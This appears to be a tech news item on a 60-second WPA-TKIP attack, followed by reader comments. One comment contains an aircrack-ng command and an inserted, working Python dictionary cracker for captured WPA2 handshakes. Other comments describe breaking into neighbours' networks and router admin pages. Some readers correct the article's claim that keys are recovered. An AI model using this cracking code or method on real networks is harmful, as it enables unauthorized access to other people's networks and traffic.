WPA keys gone in 60 seconds

Networking nerds claim to have devised a way of breaking Wi-Fi Protected Access (WPA) encryption within 60 seconds. The technique, developed by Toshihiro Ohigashi of Hiroshima University and Masakatu Morii of Kobe University, is based on the established Beck-Tews method, which involves making minor changes to packets …

COMMENTS

This topic is closed for new posts.
  1. Anonymous Coward
    Flame

    Oh dear

    Everyone switch to WPA2 - we don't want another Hiroshima!

  2. northern monkey
    Thumb Up

    impressive

    I can't even type in the key in 60 seconds!!

  3. Stuart Halliday
    Flame

    Duh

    Anyone stupid enough to be using WPA, or any manufacturer who includes it in the router's list of options, deserves all they get....

  4. Tom Chiverton 1
    Boffin

    Note top of page 9 in the PDF

    Note top of page 9 in the PDF: The attack only works if you can act as a repeater to the access point i.e. the client isn't in range of the AP. This isn't very likely is it ? And if you are acting as a repeater, why not just use (the same SSID with) no password as most clients will just silently connect to you and you can MiM their traffic conventionally ?

  5. MattyB
    Boffin

    Another Reason.....

    Why I will be running Cat6 around my next house when we come to decorate each room.

    Wireless is incredibly unreliable on my home network, and powerline has allowed my downstairs neighbour access to my UPnP server, as the "encryption" included with the powerline adapters is XP/Vista only and my UPnP server is on my NAS.

    Although I must admit, I'm much more excited than the missus about the prospect of a fully distributed gigabit LAN.

  6. adnim

    A dictionary attack

    against WPA2-CCMP works providing one can capture the handshake and the password is a dictionary word. So WPA2 is not secure either. Don't use a dictionary word PSK to secure a WLAN, ever. It took me less than 5 seconds to retrieve the PSK for my WLAN (avalon); I did, however, have to put my nonsensical PSK into my dictionary/wordlist.

    :~$ aircrack-ng -a 2 -e avalon -w ./dict/wordlist ./dump01-01.cap

    So simple even I could do it.
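    The check aircrack-ng performs for each wordlist entry can be written out in a few dozen lines, which makes it clear why a dictionary-word PSK falls in seconds and a nonsensical one does not. What follows is an added example, not adnim's code and not aircrack-ng's: it derives the PMK from the candidate passphrase and SSID (PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt), expands it to the PTK, and compares the MIC it computes over the second handshake message with the one in the capture. The "capture" is synthesized in code: the MAC addresses, nonces, passphrase, wordlist and the EAPOL-Key frame layout (key data left empty) are all constructed for the example; only the SSID "avalon" is taken from the post.

```python
"""Offline WPA2-PSK dictionary attack against a (synthetic) captured 4-way handshake."""
import hashlib
import hmac
import struct

# Byte offset of the 16-byte MIC inside an EAPOL-Key frame:
# 802.1X header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + ID (8).
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # This is the only expensive step per candidate, and the SSID is the salt,
    # so tables can be precomputed for common SSIDs.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_sha1(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated.
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_kck(pmk, ap_mac, client_mac, anonce, snonce):
    # PTK = PRF-384(PMK, "Pairwise key expansion",
    #               min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    # Its first 16 bytes are the KCK, the key that authenticates handshake messages.
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_sha1(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck, eapol_zero_mic, version):
    # Key descriptor version 1 (WPA/TKIP) uses HMAC-MD5;
    # version 2 (WPA2/CCMP) uses HMAC-SHA1 truncated to 16 bytes.
    if version == 1:
        return hmac.new(kck, eapol_zero_mic, hashlib.md5).digest()
    return hmac.new(kck, eapol_zero_mic, hashlib.sha1).digest()[:16]


def zero_mic(eapol):
    # The MIC is computed over the frame with its own MIC field set to zero.
    return eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]


def crack_handshake(hs, wordlist):
    """Return the first candidate whose derived MIC matches the capture, else None."""
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    frame = zero_mic(hs["eapol"])
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = derive_kck(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, frame, hs["version"]), captured_mic):
            return candidate
    return None


def build_eapol_msg2(snonce, version):
    # Constructed message 2 of the handshake (client -> AP). key_info sets the
    # MIC bit (0x0100), the pairwise bit (0x0008) and the descriptor version;
    # key data (normally the client's RSN IE) is left empty in this sample.
    key_info = 0x0100 | 0x0008 | version
    body = (b"\x02" + struct.pack(">HHQ", key_info, 0, 1) + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16
            + struct.pack(">H", 0))
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


def simulate_capture(passphrase, ssid, version=2):
    # Stands in for a sniffer: constructed MACs and nonces, MIC computed from the real PSK.
    ap_mac = bytes.fromhex("001122334455")      # constructed
    client_mac = bytes.fromhex("66778899aabb")  # constructed
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    frame = build_eapol_msg2(snonce, version)
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    mic = eapol_mic(kck, frame, version)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "version": version, "eapol": frame}


if __name__ == "__main__":
    hs = simulate_capture("trout-colour-41", "avalon")
    print(crack_handshake(hs, ["password", "avalon", "letmein"]))  # None: PSK not in wordlist
    print(crack_handshake(hs, ["password", "trout-colour-41"]))   # trout-colour-41
```

    Every candidate costs 4096 HMAC-SHA1 rounds, so the speed of the attack is set entirely by how short the wordlist needs to be; a PSK that is not in it is not found, which is exactly why the post's nonsensical PSK had to be added to the wordlist first.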

  7. Anonymous Coward
    Happy

    Excuse

    My internet connection downloaded that? You must be mistaken. Someone must have hacked my WPA.

    It's on my computer? Well they transferred it once they'd done the hack.

    Anon, in case this actually happens to me, as I really don't download anything I shouldn't.

  8. Bilgepipe
    Gates Horns

    @Stuart Halliday

    It's easy to call people stupid for using weak security, but with routers and access points being sold in Tescos as commodity equipment, people assume that you just plug it in and use it, just like your TV. The router manufacturers are a great deal more culpable than the users are stupid.

  9. Anonymous Coward
    Grenade

    Shame its Not WGA thats Gone..

    That is all

  10. ChrisC
    Thumb Down

    @Stuart Halliday

    I'm sure there are quite a few wifi users out there who *know* their setups aren't as secure as they could/should be, but simply don't have the spare cash to upgrade all of their wireless-enabled devices to ones that can support WPA2.

  11. Misha Gale
    Thumb Down

    Not a key stealing attack?

    OK, I'm neither an expert on cryptography nor on network security, which is why I read the dumbed-down versions on El Reg, but something doesn't seem quite right here. AFAIK, the Beck-Tews attack is able to intercept and modify small packets of data, *not* obtain the key to a network, two very different things. And apparently this new attack does the same thing, only faster.

    So how are "WPA keys gone in 60 seconds"? This is a serious attack, but this article seems to be exaggerating somewhat.

    As I said before, I'm not an expert, and I'd be happy for someone to explain to me that I'm wrong.

  12. Brett 1
    FAIL

    If Wireless networks are so quick and easy to hack

    Then why, when I am stuck somewhere with no internet access, can't I just quickly spend 10-15 mins running some tools to hack their network and then start using the internet? I have yet to see anybody demonstrate to me how I can do this using easily available and configurable tools.

    B

  13. Anonymous Coward
    Anonymous Coward

    @Bilgepipe

    I have to agree with Bilgepipe on this; in fact the whole way in which computers and associated equipment are sold is more the cause of the problems with security than thick end users. Manufacturers of hardware and software (I'm looking at you, Microsoft) are selling their products under the premise that all you have to know is how to plug it in, like a washing machine, when this is plainly not the case.

  14. Anonymous Coward
    Boffin

    It's not only end users who are stupid!

    I work for a large IT Company. Not small and not red. I got a brand new laptop last week and guess what. I have had to configure the guest account on my wireless network for WPA so as to be able to connect to the network with my new company laptop.

    Ok so the company data is protected by VPN but hell, even my mum could run an IT department better than this bunch.

  15. Blacklight

    What about AES?

    So does this touch AES, or only TKIP?

    Due to some legacy devices, some networks run WPA2 with WPA fallback, and may be exposing themselves, but only if they're running TKIP?

  16. Anonymous Coward
    Paris Hilton

    Re: Brett 1

    I agree. I have yet to see, or hear of for that matter, a wireless hack/crack that is able to be perpetrated by someone other than a security expert, or at least someone very familiar with network security and also Linux.

    Until I see a freely or commercially available program that will let the guy next door do this at the click of a button (or six), this is a non-issue unless you are worried about corporate espionage. And if you ARE worried about corporate espionage... why the fusk are you using a wireless network?

    Paris because she allows a hell of a lot more access than a WPA secured router.

  17. Anonymous Coward
    Happy

    @AC

    You can run the IT department better? Step up to the job before whining about it.

    Regards,

    The 'Large IT Company' IT Manager.

  18. Anonymous Coward
    Linux

    re: Easily available tools

    Hate to break it to everyone who thinks these techniques aren't free and easily available. There are live CDs designed to do just this. Take a look at BackTrack sometime. A freely downloadable distribution centered just around penetration testing. All it takes is little Johnny with his laptop to start taking apart your wireless network.

    And before anyone even begins to say that the tools are too difficult for anyone to use, it takes all of five seconds to Google for a step-by-step, paint-by-numbers, connect-the-dots guide for cracking wireless networks using the tools. Hell, YouTube has videos you can watch, if reading simple guides is too hard.

    Yes, this stuff is everywhere.

  19. Anonymous Coward
    FAIL

    Get real ...

    ... unless you're living in a city, or a large town, where geeks frequently war drive, or unless you suspect your nearest neighbours are uber geeks, for the love of sensibility, get a grip already.

    I'm not advocating ignoring this kind of thing, but let's get real: most people have a slim-to-none chance of having their wireless hacked into, even on WEP.

  20. Chris 211

    @The 'Large IT Company' IT Manager.

    Face it, IT companies haven't a clue. What you want is a proper certified network engineer. Any fool who can install XP seems to call himself an IT consultant.

    WPA, like WEP before it, is better than nothing, and of course WPA2 with its AES encryption is the recommended option. Anyway, wireless is good for nothing more than easy-access casual browsing and little else. People seem to have forgotten wireless is a shared medium like hubs, and nobody uses a hub these days, do they?

    Oh, and can low-end AP manufacturers add a power setting and get end users to set it, so a whole street won't be competing for RF bandwidth! It also means the hackers would have to sit on your front doorstep!

  21. Anonymous Coward
    Pirate

    driveby 4tw...

    As someone who has on occasion done a bit of drive-by web access out of hours in times gone by,

    I can confirm that those dumb APs that blast out their signal at max strength with a range of 100m+ sure are a boon to those of us who cannot afford to be camped out directly on the owner's doorstep just to get a bit of RPG/web action.

    Oh, and a multi-boot netbook is more than enough to do the hunting and key breaking in Linux and the RPG avatar web abuse in M$....

    Yarrrr,,,,,,

  22. M Gale
    Paris Hilton

    eh..

    As far as I'm aware even ye olde WPA is only fast to crack if you use dictionary words. Make your password something obfuscated and you shouldn't have a problem unless the people cracking your network happen to have brought a lawd-knows-how-many-nodes Beowulf with them, surely?

    Paris, because she knows all about unsecured access.

  23. Anonymous Coward
    Pirate

    Re: Brett 1

    A novice couldn't do it, but the only reason for that is it has not been pre-packaged into an easy to use GUI for Windows. If someone did that then people would be under a lot more pressure to use more secure methods.

    I know very little about how the methods work, but I managed to hack three of my neighbours and steal their internets (and also took control of the router admin so that I could open some ports for my torrents; the BT Home Hub had loads of vulnerabilities).

    I used aircrack-ng, which is a command line tool for Linux that basically does it all for you, although it doesn't hold your hand. It took a bit of working out, but there are tutorials out there.

    People think they are safe but you don't know who your neighbour is. It might be me.

  24. Bibulous
    Thumb Down

    WRONG

    Read the paper - neither this nor Beck-Tews can recover WPA keys. You can falsify ARP packets, which is fairly significant but a world away from recovering the key and being able to read all traffic in clear. "37% of WPA-TKIP encrypted ARP can be read and falsified in best case time of 60 seconds" is very different to the message that the media has portrayed. Disappointing reporting!!
